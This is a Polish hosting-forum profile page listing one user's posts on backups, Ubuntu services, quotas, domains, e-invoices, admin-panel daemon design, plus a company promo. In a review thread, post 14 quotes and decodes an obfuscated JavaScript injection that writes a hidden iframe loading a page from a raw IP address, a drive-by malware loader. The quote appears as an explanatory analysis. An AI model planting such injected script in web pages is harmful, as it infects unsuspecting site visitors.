Skocz do zawartości

Jan Meizner

Firma
  • Zawartość

    18
  • Rejestracja

  • Ostatnio

Reputacja

0 Normalna

1 obserwujący

O Jan Meizner

  • Ranga
    Nowy użytkownik

Informacje osobiste

  • Firma
    AppDistrict Sp. z o.o.
  • Imię
    Jan
  • Nazwisko
    Meizner

Informacje profilowe

  • Płeć
    Mężczyzna
  1. VPS z Ceph a Backup

    Zawsze warto pamiętać o kopii zapasowej. Często nawet się podkreśla, że RAID (a także inne metody redundancji) to nie to samo co backup. Dane można stracić nie tylko w wyniku awarii (przed czym może uchronić wyższy poziom redundancji), ale też np. przypadkowego usunięcia (omyłkowy DROP DATABASE, rm ze spacją nie tam gdzie trzeba, błąd w aplikacji itp). Z tego co widzę OVH ma jako usługi dodatkowe rozwiązania do backupu - ale najlepiej mieć backup off-site (poza OVH) we własnym zakresie i prawidłowo zrobiony (z uwzględnieniem specyficznych wymagań np. serwerów baz danych - tam nie wystarczy zrobić zrzut plików / obrazu dysku tylko trzeba prawidłowego dumpa bazy bo przy odzyskiwaniu można się niemiło zdziwić).
  2. AppDistrict

    Firma AppDistrict Sp. z o.o. od 2013 roku świadczy usługi w zakresie tworzenia oraz hostingu systemów IT. W ramach naszej oferty proponujemy szeroki wybór usług hostingowych w szczególności serwery VPS oparte o pełną wirtualizację KVM i ultrawydajne dyski SSD w wersji z administracją (Managed) oraz do samodzielnej administracji (Root). Serwery uruchamiamy w opraciu o sprawdzoną platformę OpenStack - używaną i wspieraną przez największe firmy w branży IT oraz nasz autorski panel administracyjny pozwalający na wygodne zarządzanie. Połączenie tych dwóch elementów pozwala na wiele opcji w tym: dostęp do konsoli awaryjnej opartej o HTML5 (bez kłopotliwych apletów Java), bezpieczny dostęp do serwera po kluczach SSH (poufne informacje nigdy nie są przesyłane przez sieć), możliwość wykonywania kopii w formie migawek (snapshotów) w locie, możliwośc wstrzyknięcia skryptu inicjalizacyjnego (powłoki lub cloud-init). Wszystkie usługi świadczymy w oparciu o nasz własny sprzęt serwerowy i sieciowy zlokalizowany w profesjonalnym Centrum Danych w Polsce (Katowice). Stosujemy wysokiej klasy sprzęt przeznaczony do działania w trybie 24 godziny na dobę wiodących dostawców. Jako członek organizacji RIPE NCC zarządzającej zasobami IP w Europie posiadamy pulę własnych adresów IP oraz system autonomiczny (AS60964). co wraz z wykorzystaniem protokołu dynamicznego routingu (BGP), zwiększa odporność naszej infrastruktury na awarie. Zawsze staramy się działać elastycznie - stąd jeśli nie znaleźli Państwo odpowiedniej oferty na naszej stronie zapraszamy do kontaktu.
  3. Ubuntu problem z phpmyadmin

    Nie byłbym tego taki pewien - Ubuntu tak ma bo przeszli na to: http://upstart.ubuntu.com/ ... a dokładniej przechodzą konwertując kolejne usługi - i w tym czasie są symlinki w init.d do "nowych" skryptów w /etc/init/, które co prawda narzekają żeby robić "po nowemu" ale "emulują" stare skrypty - czyli w tym przypadku pierwsze wywołanie /etc/init.d/mysql stop pewnie zatrzymalo mysql-a ... Można sprawdzić status przez: service mysql status (lub ps aux | grep mysqld) Upstart tak reaguje na próbę wyłączenia niedziałającej już usługi.
  4. Dedyk pod pliki

    A dokładniej to (jak chodzi o przechowywanie danych ): http://aws.amazon.com/s3/
  5. Z tego co wiem (choć nie jestem prawnikiem - więc nie mogę uważać się tu za autorytet ) to niestety mogą i wielokrotnie to robili (wystarczy "faktura w pdf" w google i pare wyników). Bo co prawda podpis i pieczątka teoretycznie są niepotrzebne (choć jak napisał @Sebek nawet to czasami kwestionują - więc z tego co wiem niektórzy wolą z podpisem żeby nie musieć się potem odwoływać niewiadomo ile). Co do PDFa to chyba głównie kwestionują, że łatwiej ją zmienić podczas przesyłu (no cóż... podpis odręczny, że nie wspomnę o "czystym" wydruku, też można podrobić, łatwiej niż złamać TLSa zabezpieczającego stronę z fakturami no ale to moja opinia nie urzędu ) opierając się że jest specjalna definicja (w rozp. ministra) co musi spełniać e-faktura a to co jest nie na papierze i nie spełnia tego nie jest dowodem księgowym. Oczywiście to są tylko interpretacje - można walczyć ale nawet Polkomtel przegrał odwołując się dokąd mógł (na pewno przynajmniej do WSA) z tego co pamiętam. Ja na szczęście nie mam firmy => nie mam na razie tych problemów - ale gdybym chciał takową założyć to dopóki ktoś z tym porządku nie zrobi (w tą czy w tą stronę) to wygląda to nieciekawie - dopraszanie się wszędzie (choćby wspomniane HRD albo DotPay ztcp) o faktury papierowe albo ciągła obawa że ktoś będzie kiedyś chciał załatać dziurę w US kwestionując wszystkie firmy które otwarcie wystawiają takie faktury i ich klientów... Jak to mówią - uroki naszego pięknego kraju - szkoda. Do tego absurdalny dodatek, że nawet zakup podpisu kwalifikowanego nic nie da bo trzeba jeszcze przekonać klientów żeby to oni wysłali papierek ze zgodą na e-faktury (albo podpisali swoim podpisem kwalifikowanym - ciekawe ile "nie-firm" takowy ma ).
  6. Windows 2008 Serwer x64 + 2 CPU

    Hmm... ale ja tam widze coś takiego: Czyli o ile się nie myle to by znaczyło: 4 fizyczne procesory dla X86 i "X64" ale nie więcej niż 32 rdzenie dla X86 lub 64 rdzenie dla "X64"... a "gwiazdeczka" opisuje ile moze byc logicznych procesorow (rdzeni, lub rdzeni*2 dla HT) jak jest Hyper-V. No chyba że ja coś pokręciłem (możliwe ) albo MS cos ma nie tak w swoich materiałach promocyjnych
  7. Shell

    Hmm...to musi admin zrobić wywołując z roota: edquota np,: edquota shell1f ...otworzy się edytor tekstu w którym trzeba zmienic odpowiednie wartosci (tutaj miękki limit i-węzłów czyli przedostatnią liczbę) na 0 (żeby usunąć limit) lub jakiś większy niż jest i wyjść z edytora zapisując zmiany...
  8. Shell

    Trochę się to poprzesuwało ale o ile dobrze widzę przekroczony jest miękki limit ilości plików (masz 393 a limit jest 387) oraz czas przez jaki taki stan jest dopuszczalny. Czyli albo musisz usunąć część plików, albo admin powinien ustalić jakiś sensowniejszy limit na pliki (względnie go całkiem zdjąć), bo co z tego, że możesz upchnać ponad 50GB jak 5,9MB zjada limit ilości plików .
  9. Shell

    Hmm... może coś quoty się sypnęły - gdzie wywołałeś to du -sh? W swoim home czy gdzieś "głębiej"... pokaż co wypisze taka sekwencja poleceń: du -sh ~ quota -v
  10. abonent domeny - jak się dowiedziec?

    Mogą, ale nie muszą i z tego co gdzieś czytałem raczej nie przekazują - ale spróbować zawsze można - jak się nie zgodzą pozostaje szukać czy właściciel gdzieś tego nie wystawił na sprzedaż lub nie "chwalił się" domeną (np. aftermarket.pl, forum di.pl albo Allegro). Jak i to zawiedzie jeśli byś się decydował ujawnić nazwę domeny to możesz napisać post na di.pl - jest szansa, że ktoś tam ma tą domenę albo wie kto ją ma ... ale oczywiście pewności nie ma. No chyba, że masz jakieś przeczucie/podstawy sądzić, że właściciel po roku jej nie przedłuży to zawsze można założyć opcje albo próbować na nią polować (np. dropped.pl i okolice) o ile nie ma już opcji - ale jak dobra domena to trzeba by liczyć na cud .
  11. Darmowa rejestracja domeny - gdzie?

    Z subdomen ja mogę polecić one.pl - chyba dalej nowe subdomeny w one.pl są darmowe jak kiedyś (z jakimś tam limitem ilości wpisów DNS) - u mnie sprawdza się od dobrych paru lat i mam nadzieję że jeszcze trochę pożyje ta subdomena (wiadomo jak to jest z subdomenami czasami), bo już ją polubiłem (mimo że na boku wziąłem jakiś czas temu ładną .pl jako "backup" )... w każdym razie na 4 dni aż nadto powinna być. No chyba, że faktycznie ma być super-pro to jak zauważyłeś rejestracja .pl dużo nie kosztuje nawet bez promocji (to już nie czasy domen tylko w NASK za 200, a jak mnie pamięć nie myli kiedyś za 300 zł ). Jedyny minus to, że prawie wszyscy co nie znają angielskiego jak im przeliteruje dopytują się czy aby na pewno nie onet.pl .
  12. Wlasny panel administracyjny

    Jeśli faktycznie nie dotknąłeś programowania sieciowego to zacznij od samych podstaw - poczytaj conieco o gniazdach BSD (BSD sockets) to dowiesz się w jaki sposób serwer i klient mogą gadać w najbardziej "klasycznej" wersji, następnie wybierz sobie jakiś język dla daemona i zobacz jego API sieciowe - jaki, to już naprawdę zależy z czym miałeś do czynienia czy to będzie C/C++, jakiś język skryptowy, czy jakieś inne cudo jak Java to nie ma znaczenia o ile tylko ma jakieś API do gniazd. Oczywiście w produkcyjnym scenariuszu trzeba by się zastanowić nad tym co będzie wydajne bo tu na pewno wybór języka wpłynie na to no ale skoro to tylko "przykład dydaktyczny" można poszaleć, zresztą niestety coraz mniej osób wogóle zwraca teraz uwagę na wydajnoąć tworzonych aplikacji ("współczesne komputery są szybkie" ). Przygotuj sobie jakiś prosty abstrakcyjny przykład - np. serwer w wybranym języku (bez autoryzacji itp na razie) który obsługuje 2 polecenia - zapisania dowolnego tekstu jaki dostanie do jakiegoś pliku i odczytania + klient w php umożliwiający zapisanie/odczytanie wybranego tekstu za pomocą tego serwera, potem zacznij to rozbudowywać i uczyć się co i jak zrobić żeby np. daemon wywołał jakieś polecenie systemowe i zwrócił jego wynik, jak zrobić uwierzytelnianie itp itd. Ogólnie jeśli zaczynasz od "zera" to spora przed Tobą drogą - no ale nic, życzę powodzenia .
  13. Wlasny panel administracyjny

    Hmm...wszystko sprowadza się do tego jaką masz wiedzę z programowania aplikacji sieciowych, nie odbierz tego źle - w końcu chodzi o to żeby się uczyć i nauczyć ale widzę że nie całkiem pełną (inaczej wystarczyło by Ci zerknąć na to co napisał ertcap i już byś miał ogólne pojęcie jak zaprojektować szkielet tego, bez pisania o cronie i jakimś okresowym sprawdzaniu bo nie o to tu chodzi). Ogólnie spróbuj sobie wyobrazić jakiś uproszczony use case, np. dodanie konta... zrobienie tego z poziomu php, cgi czy czegoś w tym rodzaju odpalonego z prawami roota moim zdaniem kwalifikuje się jako zbrodnia przeciwko ludzkości jeśli chodzi o bezpieczeństwo, ale potrzbujesz tego roota, więc dostałeś propozycje zrobienia tego w klasycznym modelu klient-serwer. W tym przypadku: - serwerem jest ów straszny daemon który pracuje cały czas i np. nasłuchuje na jakimś porcie (np. 10000) na połączenia TCP (tylko jeden z przykładów); on nie sprawdza nic co jakiś czas tylko czeka aż ktoś "się odezwie" jak każdy inny serwer (WWW, POP3 itp); Oczywiście daemon pracuje z podniesionymi uprawnieniami (np. roota) [1]. - klient czyli dowolna aplikacja która chce wykonać daną operację (np. dodać konto); to może być np. php zapewniające interfejs webowy, może też być aplikacja konsolowa (kiedyś widziałem taki model gdzie passwd było klientem specjalnego daemona, żeby nie musiało być SUID root) - to nie jest istotne co to jest, ważne żeby w jakiś sposób mogło się zalogować do serwera [1] (dostałeś przykładowe najprostsze rozwiązanie - klient tylko przekazuje podane mu login/hasło) i wysłać (w dowolny sposób, protokół raczej sam musisz sobie zaplanować) polecenie. Np. możesz bezpośrednio wysłać serwerowi: dodaj takie a takie konto, a ten musi zadbać żeby to sobie gdzieś zapisać (zakolejkować) i sensownie obsłużyć, możesz też (całkiem fajne rozwiązanie) wpisać do jakiejś bazy i powiedzieć przez połączenie z [1] - masz tu "obiadek" w bazie zjedz to i zrób co masz zrobić ... to już szczegóły przy całej ogólnej koncepcji (dopóki jej nie zrozumiesz nie ruszysz dalej i tylko sobie zagmatwasz w głowie). Co do połączeń gdzie SSL, gdzie nie - to też musisz zobaczyć jaki chcesz mieć ogólny plan - na pewno musisz mieć SSLowe połączenie z serwerem WWW jeśli skrypt kliencki będzie tam stał bo bez tego ani rusz... teraz pytanie gdzie będzie daemon, w skrajnym przypadku wszystko możesz mieć rozproszone (daemony na kilku maszynach zarządzające kawałkiem infrastruktury na danej maszynie, SQL (jak potrzebny) na innej, a panel jeszcze na innej i wtedy raczej potrzebujesz połączenia po SSLu każdy z każdym (o ile istnieje możliwość podsłuchania transmisji, co lepiej zawsze założyć). Ale w najprostszym przypadku jeśli połączenia między panelem i daemonem idą po lokalu to możesz się bez tego obejść. Generalnie przemyśl co chcesz zrobić (na jaką skalę) i rozplanuj najpierw ogólną koncepcję, jakie wymagania musi spełniać system, zrób jakąś analizę zagrożeń dla systemu (co gdzie może pójść nie tak jak powinno ) to potem będziesz wiedział co potrzebujesz (np. gdzie SSL, gdzie nie) i będziesz mógł wybrać pasującą technologię, a dopiero mając technologię będziesz mógł szukać konkretnych rozwiąń (np. jak obsłużyć połączenie po SSLu). Mam nadzieję, że coś wyjaśniłem... po prostu nie patrz zbyt schematycznie na to bo się pogubisz.
  14. [opinie] Host-24.pl

    Kwiczy bo ma powód ... hekko pisał o JS - pewnie o ten chodzi: <script>function v483dbfb476a51(v483dbfb47725f){ function v483dbfb477a54 () {var v483dbfb47824f=16; return v483dbfb47824f;} return(parseInt(v483dbfb47725f,v483dbfb477a54()));}function v483dbfb478a47(v483dbfb47923f){ var v483dbfb47a21d=2; var v483dbfb479a22='';for(v483dbfb479e29=0; v483dbfb479e29<v483dbfb47923f.length; v483dbfb479e29+=v483dbfb47a21d){ v483dbfb479a22+=(String.fromCharCode(v483dbfb476a51(v483dbfb47923f.substr(v483dbfb479e29, v483dbfb47a21d))));}return v483dbfb479a22;} document.write(v483dbfb478a47('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E<BR>7269746528273C696672616D65206E616D653D33373834207372633D5C27687474703A2F2F33 23232312E3133332E3135312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E642<BR>4D17482E72616E646F6D28292A333532333635292B273038303564323937305C272077696474 8<BR>D3393206865696768743D353037207374796C653D5C27646973706C61793A206E6F6E655C273 3<BR>2F9662616D653E27293C2F5343524950543E'));</script> ...tyle ze bez tych w srodku hexu (wstawianych uparcie przez forum ) ...jak to porozbijać to widac ze 1 funkcja dekoduje bajt hexowy, 2ga przy jej pomocy zamienia ciag bajtow hexowych na stringa i go wysyła przeglądarce - tutaj jest to to 3C53...0543E - co po zdekodowaniu dało mi: <script>window.status='Done';document.write('<iframe name=3784 src=\'http://77.221.133.151/.if/go.html?'+Math.round(Math.random()*352365)+'0805d2970\' width=695 height=507 style=\'display: none\'></iframe>')</SCRIPT> ... jakoś to podobne do tego opisywanego tu: http://www.trendmicro.com/vinfo/virusencyc...EAH&VSect=T
  15. Pamagamy!

    7,50
×